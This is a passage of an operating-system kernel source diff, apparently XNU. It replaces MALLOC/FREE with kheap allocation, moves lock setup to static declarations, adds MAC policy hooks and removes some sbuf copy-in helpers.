-       /* If auditing is on and print buffer is NULL, allocate it now */
-       if ((flags & MCF_DEBUG) && mca_dump_buf == NULL) {
-               int malloc_wait = (wait & MCR_NOSLEEP) ? M_NOWAIT : M_WAITOK;
-               MALLOC(mca_dump_buf, char *, DUMP_MCA_BUF_SIZE, M_TEMP,
-                   malloc_wait | M_ZERO);
-               if (mca_dump_buf == NULL) {
-                       return NULL;
-               }
-       }
-
-       buf = zalloc(mcache_zone);
+       buf = zalloc_flags(mcache_zone, Z_WAITOK | Z_ZERO);
        if (buf == NULL) {
                goto fail;
        }
 
-       bzero(buf, MCACHE_ALLOC_SIZE);
-
        /*
         * In case we didn't get a cache-aligned memory, round it up
         * accordingly.  This is needed in order to get the rest of
@@ -358,10 +334,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
        (void) snprintf(cp->mc_name, sizeof(cp->mc_name), "mcache.%s", name);
 
        (void) snprintf(lck_name, sizeof(lck_name), "%s.cpu", cp->mc_name);
-       cp->mc_cpu_lock_grp_attr = lck_grp_attr_alloc_init();
-       cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name,
-           cp->mc_cpu_lock_grp_attr);
-       cp->mc_cpu_lock_attr = lck_attr_alloc_init();
+       cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name, LCK_GRP_ATTR_NULL);
 
        /*
         * Allocation chunk size is the object's size plus any extra size
@@ -383,20 +356,14 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
         * Initialize the bucket layer.
         */
        (void) snprintf(lck_name, sizeof(lck_name), "%s.bkt", cp->mc_name);
-       cp->mc_bkt_lock_grp_attr = lck_grp_attr_alloc_init();
        cp->mc_bkt_lock_grp = lck_grp_alloc_init(lck_name,
-           cp->mc_bkt_lock_grp_attr);
-       cp->mc_bkt_lock_attr = lck_attr_alloc_init();
-       lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp,
-           cp->mc_bkt_lock_attr);
+           LCK_GRP_ATTR_NULL);
+       lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp, LCK_ATTR_NULL);
 
        (void) snprintf(lck_name, sizeof(lck_name), "%s.sync", cp->mc_name);
-       cp->mc_sync_lock_grp_attr = lck_grp_attr_alloc_init();
        cp->mc_sync_lock_grp = lck_grp_alloc_init(lck_name,
-           cp->mc_sync_lock_grp_attr);
-       cp->mc_sync_lock_attr = lck_attr_alloc_init();
-       lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp,
-           cp->mc_sync_lock_attr);
+           LCK_GRP_ATTR_NULL);
+       lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp, LCK_ATTR_NULL);
 
        for (btp = mcache_bkttype; chunksize <= btp->bt_minbuf; btp++) {
                continue;
@@ -412,8 +379,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
                mcache_cpu_t *ccp = &cp->mc_cpu[c];
 
                VERIFY(IS_P2ALIGNED(ccp, CPU_CACHE_LINE_SIZE));
-               lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp,
-                   cp->mc_cpu_lock_attr);
+               lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp, LCK_ATTR_NULL);
                ccp->cc_objs = -1;
                ccp->cc_pobjs = -1;
        }
@@ -896,17 +862,9 @@ mcache_destroy(mcache_t *cp)
        cp->mc_slab_free = NULL;
        cp->mc_slab_audit = NULL;
 
-       lck_attr_free(cp->mc_bkt_lock_attr);
        lck_grp_free(cp->mc_bkt_lock_grp);
-       lck_grp_attr_free(cp->mc_bkt_lock_grp_attr);
-
-       lck_attr_free(cp->mc_cpu_lock_attr);
        lck_grp_free(cp->mc_cpu_lock_grp);
-       lck_grp_attr_free(cp->mc_cpu_lock_grp_attr);
-
-       lck_attr_free(cp->mc_sync_lock_attr);
        lck_grp_free(cp->mc_sync_lock_grp);
-       lck_grp_attr_free(cp->mc_sync_lock_grp_attr);
 
        /*
         * TODO: We need to destroy the zone here, but cannot do it
@@ -1358,7 +1316,7 @@ mcache_cache_update(mcache_t *cp)
        int need_bkt_resize = 0;
        int need_bkt_reenable = 0;
 
-       lck_mtx_assert(mcache_llock, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&mcache_llock, LCK_MTX_ASSERT_OWNED);
 
        mcache_bkt_ws_update(cp);
 
@@ -1645,13 +1603,9 @@ mcache_audit_free_verify_set(mcache_audit_t *mca, void *base, size_t offset,
 #define MCA_TRN_PREV ((mca->mca_next_trn + mca_trn_max - 1) % mca_trn_max)
 
 __private_extern__ char *
-mcache_dump_mca(mcache_audit_t *mca)
+mcache_dump_mca(char buf[static DUMP_MCA_BUF_SIZE], mcache_audit_t *mca)
 {
-       if (mca_dump_buf == NULL) {
-               return NULL;
-       }
-
-       snprintf(mca_dump_buf, DUMP_MCA_BUF_SIZE,
+       snprintf(buf, DUMP_MCA_BUF_SIZE,
            "mca %p: addr %p, cache %p (%s) nxttrn %d\n"
            DUMP_TRN_FMT()
            DUMP_TRN_FMT(),
@@ -1663,13 +1617,15 @@ mcache_dump_mca(mcache_audit_t *mca)
            DUMP_TRN_FIELDS("last", MCA_TRN_LAST),
            DUMP_TRN_FIELDS("previous", MCA_TRN_PREV));
 
-       return mca_dump_buf;
+       return buf;
 }
 
 __private_extern__ void
 mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset,
     int64_t expected, int64_t got)
 {
+       char buf[DUMP_MCA_BUF_SIZE];
+
        if (mca == NULL) {
                panic("mcache_audit: buffer %p modified after free at "
                    "offset 0x%lx (0x%llx instead of 0x%llx)\n", addr,
@@ -1680,7 +1636,7 @@ mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset,
 
        panic("mcache_audit: buffer %p modified after free at offset 0x%lx "
            "(0x%llx instead of 0x%llx)\n%s\n",
-           addr, offset, got, expected, mcache_dump_mca(mca));
+           addr, offset, got, expected, mcache_dump_mca(buf, mca));
        /* NOTREACHED */
        __builtin_unreachable();
 }
index 7621bdec37e4b4c4c6a0dd543ab0ca955a7607bb..89a714051a8b6ef0ca649d000df80f099507744c 100644 (file)
@@ -121,7 +121,7 @@ common_hook(void)
        return rv;
 }
 
-#if (MAC_POLICY_OPS_VERSION != 69)
+#if (MAC_POLICY_OPS_VERSION != 74)
 # error "struct mac_policy_ops doesn't match definition in mac_policy.h"
 #endif
 /*
@@ -238,9 +238,9 @@ const static struct mac_policy_ops policy_ops = {
        CHECK_SET_HOOK(mount_label_init)
        CHECK_SET_HOOK(mount_label_internalize)
 
-       .mpo_reserved38 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved39 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved40 = (mpo_reserved_hook_t *)common_hook,
+       CHECK_SET_HOOK(proc_check_expose_task_with_flavor)
+       CHECK_SET_HOOK(proc_check_get_task_with_flavor)
+       CHECK_SET_HOOK(proc_check_task_id_token_get_task)
 
        CHECK_SET_HOOK(pipe_check_ioctl)
        CHECK_SET_HOOK(pipe_check_kqfilter)
@@ -339,8 +339,8 @@ const static struct mac_policy_ops policy_ops = {
        CHECK_SET_HOOK(socket_check_setsockopt)
        CHECK_SET_HOOK(socket_check_getsockopt)
 
-       .mpo_reserved50 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved51 = (mpo_reserved_hook_t *)common_hook,
+       CHECK_SET_HOOK(proc_check_get_movable_control_port)
+       CHECK_SET_HOOK(proc_check_dyld_process_info_notify_register)
        .mpo_reserved52 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved53 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved54 = (mpo_reserved_hook_t *)common_hook,
@@ -351,7 +351,8 @@ const static struct mac_policy_ops policy_ops = {
        .mpo_reserved59 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved60 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved61 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved62 = (mpo_reserved_hook_t *)common_hook,
+
+       CHECK_SET_HOOK(iokit_check_open_service)
 
        CHECK_SET_HOOK(system_check_acct)
        CHECK_SET_HOOK(system_check_audit)
index 38106d0430f4e59151a3e028cd66c352be1a0b8a..3b5fc195a0a47592987e54989568ef34050de685 100644 (file)
@@ -181,13 +181,11 @@ static const struct fileops psemops = {
        .fo_kqfilter = fo_no_kqfilter,
 };
 
-static lck_grp_t       *psx_sem_subsys_lck_grp;
-static lck_grp_attr_t  *psx_sem_subsys_lck_grp_attr;
-static lck_attr_t      *psx_sem_subsys_lck_attr;
-static lck_mtx_t        psx_sem_subsys_mutex;
+static LCK_GRP_DECLARE(psx_sem_subsys_lck_grp, "posix semaphores");
+static LCK_MTX_DECLARE(psx_sem_subsys_mutex, &psx_sem_subsys_lck_grp);
 
-#define PSEM_SUBSYS_LOCK() lck_mtx_lock(& psx_sem_subsys_mutex)
-#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_sem_subsys_mutex)
+#define PSEM_SUBSYS_LOCK() lck_mtx_lock(&psx_sem_subsys_mutex)
+#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(&psx_sem_subsys_mutex)
 #define PSEM_SUBSYS_ASSERT_HELD() LCK_MTX_ASSERT(&psx_sem_subsys_mutex, LCK_MTX_ASSERT_OWNED)
 
 
@@ -195,19 +193,6 @@ static int psem_cache_add(struct pseminfo *psemp, struct psemname *pnp, struct p
 static void psem_cache_delete(struct psemcache *pcp);
 int psem_cache_purge_all(proc_t);
 
-
-/* Initialize the mutex governing access to the posix sem subsystem */
-__private_extern__ void
-psem_lock_init( void )
-{
-       psx_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       psx_sem_subsys_lck_grp = lck_grp_alloc_init("posix shared memory", psx_sem_subsys_lck_grp_attr);
-
-       psx_sem_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&psx_sem_subsys_mutex, psx_sem_subsys_lck_grp, psx_sem_subsys_lck_attr);
-}
-
 /*
  * Lookup an entry in the cache
  *
@@ -470,13 +455,13 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
         * allowed and the one at the front of the LRU list is in use.
         * Otherwise we use the one at the front of the LRU list.
         */
-       MALLOC(pcp, struct psemcache *, sizeof(struct psemcache), M_SHM, M_WAITOK | M_ZERO);
+       pcp = kheap_alloc(KM_SHM, sizeof(struct psemcache), Z_WAITOK | Z_ZERO);
        if (pcp == PSEMCACHE_NULL) {
                error = ENOMEM;
                goto bad;
        }
 
-       MALLOC(new_pinfo, struct pseminfo *, sizeof(struct pseminfo), M_SHM, M_WAITOK | M_ZERO);
+       new_pinfo = kheap_alloc(KM_SHM, sizeof(struct pseminfo), Z_WAITOK | Z_ZERO);
        if (new_pinfo == NULL) {
                error = ENOSPC;
                goto bad;
@@ -517,7 +502,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
                }
        }
 
-       MALLOC(new_pnode, struct psemnode *, sizeof(struct psemnode), M_SHM, M_WAITOK | M_ZERO);
+       new_pnode = kheap_alloc(KM_SHM, sizeof(struct psemnode), Z_WAITOK | Z_ZERO);
        if (new_pnode == NULL) {
                error = ENOSPC;
                goto bad;
@@ -616,7 +601,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
         * new . and we must free them.
         */
        if (incache) {
-               FREE(pcp, M_SHM);
+               kheap_free(KM_SHM, pcp, sizeof(struct psemcache));
                pcp = PSEMCACHE_NULL;
                if (new_pinfo != PSEMINFO_NULL) {
                        /* return value ignored - we can't _not_ do this */
@@ -624,7 +609,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
 #if CONFIG_MACF
                        mac_posixsem_label_destroy(new_pinfo);
 #endif
-                       FREE(new_pinfo, M_SHM);
+                       kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo));
                        new_pinfo = PSEMINFO_NULL;
                }
        }
@@ -644,13 +629,9 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
 bad_locked:
        PSEM_SUBSYS_UNLOCK();
 bad:
-       if (pcp != PSEMCACHE_NULL) {
-               FREE(pcp, M_SHM);
-       }
+       kheap_free(KM_SHM, pcp, sizeof(struct psemcache));
 
-       if (new_pnode != PSEMNODE_NULL) {
-               FREE(new_pnode, M_SHM);
-       }
+       kheap_free(KM_SHM, new_pnode, sizeof(struct psemnode));
 
        if (fp != NULL) {
                fp_free(p, indx, fp);
@@ -669,7 +650,7 @@ bad:
 #if CONFIG_MACF
                mac_posixsem_label_destroy(new_pinfo);
 #endif
-               FREE(new_pinfo, M_SHM);
+               kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo));
        }
 
        if (pnbuf != NULL) {
@@ -720,13 +701,13 @@ psem_unlink_internal(struct pseminfo *pinfo, struct psemcache *pcache)
 
        if (!pinfo->psem_usecount) {
                psem_delete(pinfo);
-               FREE(pinfo, M_SHM);
+               kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo));
        } else {
                pinfo->psem_flags |= PSEM_REMOVED;
        }
 
        psem_cache_delete(pcache);
-       FREE(pcache, M_SHM);
+       kheap_free(KM_SHM, pcache, sizeof(struct psemcache));
        return 0;
 }
 
@@ -1045,12 +1026,12 @@ psem_close(struct psemnode *pnode)
                PSEM_SUBSYS_UNLOCK();
                /* lock dropped as only semaphore is destroyed here */
                error = psem_delete(pinfo);
-               FREE(pinfo, M_SHM);
+               kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo));
        } else {
                PSEM_SUBSYS_UNLOCK();
        }
        /* subsystem lock is dropped when we get here */
-       FREE(pnode, M_SHM);
+       kheap_free(KM_SHM, pnode, sizeof(struct psemnode));
        return error;
 }
 
index bffc46999c305d5b234ce29883020342437d5031..4f22edd2855298ca91054dc230f38ad1dfe041f0 100644 (file)
@@ -81,7 +81,6 @@
 #include <mach/vm_prot.h>
 #include <mach/vm_inherit.h>
 #include <mach/kern_return.h>
-#include <mach/memory_object_control.h>
 
 #include <vm/vm_map.h>
 #include <vm/vm_protos.h>
@@ -204,28 +203,13 @@ static const struct fileops pshmops = {
 /*
  * Everything here is protected by a single mutex.
  */
-static lck_grp_t       *psx_shm_subsys_lck_grp;
-static lck_grp_attr_t  *psx_shm_subsys_lck_grp_attr;
-static lck_attr_t      *psx_shm_subsys_lck_attr;
-static lck_mtx_t        psx_shm_subsys_mutex;
+static LCK_GRP_DECLARE(psx_shm_subsys_lck_grp, "posix shared memory");
+static LCK_MTX_DECLARE(psx_shm_subsys_mutex, &psx_shm_subsys_lck_grp);
 
 #define PSHM_SUBSYS_LOCK() lck_mtx_lock(& psx_shm_subsys_mutex)
 #define PSHM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_shm_subsys_mutex)
 #define PSHM_SUBSYS_ASSERT_HELD()  LCK_MTX_ASSERT(&psx_shm_subsys_mutex, LCK_MTX_ASSERT_OWNED)
 
-
-__private_extern__ void
-pshm_lock_init( void )
-{
-       psx_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       psx_shm_subsys_lck_grp =
-           lck_grp_alloc_init("posix shared memory", psx_shm_subsys_lck_grp_attr);
-
-       psx_shm_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&psx_shm_subsys_mutex, psx_shm_subsys_lck_grp, psx_shm_subsys_lck_attr);
-}
-
 /*
  * Lookup an entry in the cache. Only the name is used from "look".
  */
@@ -358,7 +342,7 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval)
         * Allocate data structures we need. We parse the userspace name into
         * a pshm_info_t, even when we don't need to O_CREAT.
         */
-       MALLOC(new_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO);
+       new_pinfo = kheap_alloc(KM_SHM, sizeof(pshm_info_t), Z_WAITOK | Z_ZERO);
        if (new_pinfo == NULL) {
                error = ENOSPC;
                goto bad;
@@ -392,7 +376,8 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval)
        /*
         * Will need a new pnode for the file pointer
         */
-       MALLOC(new_pnode, pshmnode_t *, sizeof(pshmnode_t), M_SHM, M_WAITOK | M_ZERO);
+       new_pnode = kheap_alloc(KM_SHM, sizeof(pshmnode_t),
+           Z_WAITOK | Z_ZERO);
        if (new_pnode == NULL) {
                error = ENOSPC;
                goto bad;
@@ -516,9 +501,7 @@ bad:
        /*
         * Delete any allocated unused data structures.
         */
-       if (new_pnode != NULL) {
-               FREE(new_pnode, M_SHM);
-       }
+       kheap_free(KM_SHM, new_pnode, sizeof(pshmnode_t));
 
        if (fp != NULL) {
                fp_free(p, indx, fp);
@@ -531,7 +514,7 @@ done:
                        mac_posixshm_label_destroy(&new_pinfo->pshm_hdr);
                }
 #endif
-               FREE(new_pinfo, M_SHM);
+               kheap_free(KM_SHM, new_pinfo, sizeof(pshm_info_t));
        }
        return error;
 }
@@ -628,7 +611,7 @@ pshm_truncate(
                }
 
                /* get a list entry to track the memory object */
-               MALLOC(pshmobj, pshm_mobj_t *, sizeof(pshm_mobj_t), M_SHM, M_WAITOK);
+               pshmobj = kheap_alloc(KM_SHM, sizeof(pshm_mobj_t), Z_WAITOK);
                if (pshmobj == NULL) {
                        kret = KERN_NO_SPACE;
                        mach_memory_entry_port_release(mem_object);
@@ -666,7 +649,7 @@ out:
                SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next);
                PSHM_SUBSYS_UNLOCK();
                mach_memory_entry_port_release(pshmobj->pshmo_memobject);
-               FREE(pshmobj, M_SHM);
+               kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t));
                PSHM_SUBSYS_LOCK();
        }
        pinfo->pshm_flags &= ~PSHM_ALLOCATING;
@@ -987,7 +970,8 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval)
        /*
         * Get the name from user args.
         */
-       MALLOC(name_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO);
+       name_pinfo = kheap_alloc(KHEAP_TEMP, sizeof(pshm_info_t),
+           Z_WAITOK | Z_ZERO);
        if (name_pinfo == NULL) {
                error = ENOSPC;
                goto bad;
@@ -1031,9 +1015,7 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval)
 bad_unlock:
        PSHM_SUBSYS_UNLOCK();
 bad:
-       if (name_pinfo != NULL) {
-               FREE(name_pinfo, M_SHM);
-       }
+       kheap_free(KHEAP_TEMP, name_pinfo, sizeof(pshm_info_t));
        return error;
 }
 
@@ -1080,11 +1062,11 @@ pshm_deref(pshm_info_t *pinfo)
                while ((pshmobj = SLIST_FIRST(&pinfo->pshm_mobjs)) != NULL) {
                        SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next);
                        mach_memory_entry_port_release(pshmobj->pshmo_memobject);
-                       FREE(pshmobj, M_SHM);
+                       kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t));
                }
 
                /* free the pinfo itself */
-               FREE(pinfo, M_SHM);
+               kheap_free(KM_SHM, pinfo, sizeof(pshm_info_t));
 
                PSHM_SUBSYS_LOCK();
        }
@@ -1110,9 +1092,7 @@ pshm_closefile(struct fileglob *fg, __unused vfs_context_t ctx)
        }
 
        PSHM_SUBSYS_UNLOCK();
-       if (pnode != NULL) {
-               FREE(pnode, M_SHM);
-       }
+       kheap_free(KM_SHM, pnode, sizeof(pshmnode_t));
 
        return error;
 }
index 04d1aeda4c2d3a880eb8e4ff8148b07b260e5937..3d38327c9cd15768986b0db22fccdbcdb94a3ee3 100644 (file)
 #define dprintf(...) do { } while(0)
 #endif
 
-static lck_grp_attr_t  *proc_uuid_policy_subsys_lck_grp_attr;
-static lck_grp_t       *proc_uuid_policy_subsys_lck_grp;
-static lck_attr_t      *proc_uuid_policy_subsys_lck_attr;
-static lck_mtx_t        proc_uuid_policy_subsys_mutex;
+static LCK_GRP_DECLARE(proc_uuid_policy_subsys_lck_grp,
+    "proc_uuid_policy_subsys_lock");
+static LCK_MTX_DECLARE(proc_uuid_policy_subsys_mutex,
+    &proc_uuid_policy_subsys_lck_grp);
 
 #define PROC_UUID_POLICY_SUBSYS_LOCK() lck_mtx_lock(&proc_uuid_policy_subsys_mutex)
 #define PROC_UUID_POLICY_SUBSYS_UNLOCK() lck_mtx_unlock(&proc_uuid_policy_subsys_mutex)
@@ -85,6 +85,12 @@ struct proc_uuid_policy_entry {
        uint32_t        flags;  /* policy flag for that UUID */
 };
 
+/*
+ * If you need accounting for KM_PROC_UUID_POLICY consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_PROC_UUID_POLICY KHEAP_DEFAULT
+
 static int
 proc_uuid_policy_insert(uuid_t uuid, uint32_t flags);
 
@@ -103,11 +109,6 @@ proc_uuid_policy_clear(uint32_t flags);
 void
 proc_uuid_policy_init(void)
 {
-       proc_uuid_policy_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-       proc_uuid_policy_subsys_lck_grp = lck_grp_alloc_init("proc_uuid_policy_subsys_lock", proc_uuid_policy_subsys_lck_grp_attr);
-       proc_uuid_policy_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&proc_uuid_policy_subsys_mutex, proc_uuid_policy_subsys_lck_grp, proc_uuid_policy_subsys_lck_attr);
-
        proc_uuid_policy_hashtbl = hashinit(PROC_UUID_POLICY_HASH_SIZE, M_PROC_UUID_POLICY, &proc_uuid_policy_hash_mask);
        proc_uuid_policy_table_gencount = 1;
        proc_uuid_policy_count = 0;
@@ -128,7 +129,8 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags)
                return EINVAL;
        }
 
-       MALLOC(entry, struct proc_uuid_policy_entry *, sizeof(*entry), M_PROC_UUID_POLICY, M_WAITOK | M_ZERO);
+       entry = kheap_alloc(KM_PROC_UUID_POLICY, sizeof(struct proc_uuid_policy_entry),
+           Z_WAITOK | Z_ZERO);
 
        memcpy(entry->uuid, uuid, sizeof(uuid_t));
        entry->flags = flags;
@@ -140,7 +142,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags)
                /* The UUID is already in the list. Update the flags. */
                foundentry->flags |= flags;
                error = 0;
-               FREE(entry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry));
                entry = NULL;
                BUMP_PROC_UUID_POLICY_GENERATION_COUNT();
        } else {
@@ -158,7 +160,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags)
        PROC_UUID_POLICY_SUBSYS_UNLOCK();
 
        if (error) {
-               FREE(entry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry));
                dprintf("Failed to insert proc uuid policy (%s,0x%08x), table full\n", uuidstr, flags);
        } else {
                dprintf("Inserted proc uuid policy (%s,0x%08x)\n", uuidstr, flags);
@@ -222,7 +224,7 @@ proc_uuid_policy_remove(uuid_t uuid, uint32_t flags)
 
        /* If we had found a pre-existing entry, deallocate its memory now */
        if (delentry && should_delete) {
-               FREE(delentry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, delentry, sizeof(struct proc_uuid_policy_entry));
        }
 
        if (error) {
@@ -332,7 +334,8 @@ proc_uuid_policy_clear(uint32_t flags)
        /* Memory deallocation happens after the hash lock is dropped */
        LIST_FOREACH_SAFE(searchentry, &deletehead, entries, tmpentry) {
                LIST_REMOVE(searchentry, entries);
-               FREE(searchentry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, searchentry,
+                   sizeof(struct proc_uuid_policy_entry));
        }
 
        dprintf("Clearing proc uuid policy table\n");
index d7f3f5cbdfb5e6f25a5dff08f0afc2d7e1f8390d..167a99befcad90bf7dc874205a63eda73f8c6522 100644 (file)
@@ -65,8 +65,6 @@
 
 int evh_debug = 0;
 
-MALLOC_DEFINE(M_EVENTHANDLER, "eventhandler", "Event handler records");
-
 SYSCTL_NODE(_kern, OID_AUTO, eventhandler, CTLFLAG_RW | CTLFLAG_LOCKED,
     0, "Eventhandler");
 SYSCTL_INT(_kern_eventhandler, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_LOCKED,
@@ -76,9 +74,7 @@ struct eventhandler_entry_arg eventhandler_entry_dummy_arg = { .ee_fm_uuid = { 0
 
 /* List of 'slow' lists */
 static struct eventhandler_lists_ctxt evthdlr_lists_ctxt_glb;
-static lck_grp_attr_t   *eventhandler_mutex_grp_attr;
-static lck_grp_t        *eventhandler_mutex_grp;
-static lck_attr_t       *eventhandler_mutex_attr;
+static LCK_GRP_DECLARE(eventhandler_mutex_grp, "eventhandler");
 
 static unsigned int eg_size;    /* size of eventhandler_entry_generic */
 static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */
@@ -86,9 +82,8 @@ static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */
 static unsigned int el_size;    /* size of eventhandler_list */
 static struct mcache *el_cache; /* mcache for eventhandler_list */
 
-static lck_grp_attr_t   *el_lock_grp_attr;
-lck_grp_t        *el_lock_grp;
-lck_attr_t       *el_lock_attr;
+LCK_GRP_DECLARE(el_lock_grp, "eventhandler list");
+LCK_ATTR_DECLARE(el_lock_attr, 0, 0);
 
 struct eventhandler_entry_generic {
        struct eventhandler_entry       ee;
@@ -106,7 +101,7 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt)
        TAILQ_INIT(&evthdlr_lists_ctxt->eventhandler_lists);
        evthdlr_lists_ctxt->eventhandler_lists_initted = 1;
        lck_mtx_init(&evthdlr_lists_ctxt->eventhandler_mutex,
-           eventhandler_mutex_grp, eventhandler_mutex_attr);
+           &eventhandler_mutex_grp, LCK_ATTR_NULL);
 }
 
 /*
@@ -115,16 +110,6 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt)
 void
 eventhandler_init(void)
 {
-       eventhandler_mutex_grp_attr = lck_grp_attr_alloc_init();
-       eventhandler_mutex_grp = lck_grp_alloc_init("eventhandler",
-           eventhandler_mutex_grp_attr);
-       eventhandler_mutex_attr = lck_attr_alloc_init();
-
-       el_lock_grp_attr = lck_grp_attr_alloc_init();
-       el_lock_grp = lck_grp_alloc_init("eventhandler list",
-           el_lock_grp_attr);
-       el_lock_attr = lck_attr_alloc_init();
-
        eventhandler_lists_ctxt_init(&evthdlr_lists_ctxt_glb);
 
        eg_size = sizeof(struct eventhandler_entry_generic);
@@ -385,6 +370,6 @@ eventhandler_lists_ctxt_destroy(struct eventhandler_lists_ctxt *evthdlr_lists_ct
        }
        lck_mtx_unlock(&evthdlr_lists_ctxt->eventhandler_mutex);
        lck_mtx_destroy(&evthdlr_lists_ctxt->eventhandler_mutex,
-           eventhandler_mutex_grp);
+           &eventhandler_mutex_grp);
        return;
 }
index 1904851455769e1bfcad2672edb83503e5fac40f..8196722e99bba6ce659c6b5d06414ab313a649d4 100644 (file)
@@ -705,147 +705,6 @@ sbuf_done(struct sbuf *s)
        return !!SBUF_ISFINISHED(s);
 }
 
-/*!
- * @function sbuf_uionew
- *
- * @brief
- * Create a new sbuf and initialize its buffer with data from the given uio.
- *
- * @param s
- * An optional existing sbuf to initialize, or NULL to allocate a new one.
- *
- * @param uio
- * The uio describing the data to populate the sbuf with.
- *
- * @param error
- * An output parameter to report any error to.
- *
- * @returns
- * The new and/or initialized sbuf, or NULL on error.  The error code is
- * reported back via @a error.
- */
-struct sbuf *
-sbuf_uionew(struct sbuf *s, struct uio *uio, int *error)
-{
-       int size;
-
-       if ((user_size_t)uio_resid(uio) > INT_MAX - 1) {
-               *error = EINVAL;
-               return NULL;
-       }
-
-       size = (int)uio_resid(uio);
-       s = sbuf_new(s, NULL, size + 1, 0);
-       if (s == NULL) {
-               *error = ENOMEM;
-               return NULL;
-       }
-
-       *error = uiomove(s->s_buf, size, uio);
-       if (*error != 0) {
-               sbuf_delete(s);
-               return NULL;
-       }
-
-       s->s_len = size;
-       *error = 0;
-
-       return s;
-}
-
-/*!
- * @function sbuf_bcopyin
- *
- * @brief
- * Append userland data to an sbuf.
- *
- * @param s
- * The sbuf.
- *
- * @param uaddr
- * The userland address of data to append to the sbuf.
- *
- * @param len
- * The length of the data to copy from userland.
- *
- * @returns
- * 0 on success or -1 on error.  Always returns -1 if the sbuf is marked as
- * overflowed.
- */
-int
-sbuf_bcopyin(struct sbuf *s, const void *uaddr, size_t len)
-{
-       if (SBUF_HASOVERFLOWED(s)) {
-               return -1;
-       }
-
-       if (len == 0) {
-               return 0;
-       }
-
-       if (-1 == sbuf_ensure_capacity(s, len)) {
-               SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-               return -1;
-       }
-
-       if (copyin(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len) != 0) {
-               return -1;
-       }
-
-       s->s_len += (int)len;
-       return 0;
-}
-
-/*!
- * @function sbuf_copyin
- *
- * @brief
- * Append a userland string to an sbuf.
- *
- * @param s
- * The sbuf.
- *
- * @param uaddr
- * The userland address of the string to append to the sbuf.
- *
- * @param len
- * The maximum length of the string to copy.  If zero, the current capacity of
- * the sbuf is used.
- *
- * @returns
- * The number of bytes copied or -1 if an error occurred.  Always returns -1 if
- * the sbuf is marked as overflowed.
- */
-int
-sbuf_copyin(struct sbuf *s, const void *uaddr, size_t len)
-{
-       size_t done;
-
-       if (SBUF_HASOVERFLOWED(s)) {
-               return -1;
-       }
-
-       if (len == 0) {
-               len = sbuf_capacity(s);
-       } else if (-1 == sbuf_ensure_capacity(s, len)) {
-               return -1;
-       }
-
